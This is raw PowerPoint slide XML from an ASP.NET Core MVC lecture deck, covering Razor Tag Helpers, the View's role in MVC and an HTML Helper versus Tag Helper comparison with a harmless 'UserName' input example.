            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable the server-side code to participate in creating and rendering the HTML elements in Razor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML-friendly development experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rich IntelliSense environment for creating HTML and Razor markup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Produces maintainable code using information available on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ImageTagHelper appends version number to image name to resolve caching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visual Studio Tooling enabled by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Microsoft.AspNetCore.Tooling.Razor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NuGet package </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5578640"/>
            <a:ext cx="2819400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tag Helper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623878" y="5578640"/>
            <a:ext cx="2819400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generated HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2876550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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Components that display the application's user interface</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Responsible for transforming a model into a format presentable to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>For web pages, View transforms the model contents to HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1226776" y="2667000"/>
            <a:ext cx="7764824" cy="1371600"/>
            <a:chOff x="765788" y="4187874"/>
            <a:chExt cx="7764824" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="765788" y="4408363"/>
              <a:ext cx="1878374" cy="914175"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0019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r>
                <a:rPr lang="en-US" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Controller</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="914099" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(Input)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6652238" y="4378486"/>
              <a:ext cx="1878374" cy="914175"/>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r>
                <a:rPr lang="en-US" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>View</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="914099" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(Presentation)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Right Arrow 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2699792" y="4433797"/>
              <a:ext cx="3879138" cy="813661"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0019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4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect b="2703"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3581400" y="4187874"/>
              <a:ext cx="1943100" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8594"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:shade val="85000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24984359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helpers vs Tag Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag Helper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Helper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Result</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543577" y="1679618"/>
            <a:ext cx="4985327"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8088"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cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>input asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0600FF"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>"UserName"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648082" y="1541863"/>
            <a:ext cx="3391296" cy="762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7" name="Rectangle 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2543577" y="3409123"/>
            <a:ext cx="5640956"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8088"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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>@Html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>EditorFor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t> l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="4810732"/>
            <a:ext cx="8991599" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="text-box single-line“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="text"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=""&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21245394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Helper Scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@addTagHelper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>makes Tag Helpers available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Including it in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>_ViewImports.cshtml </a:t>
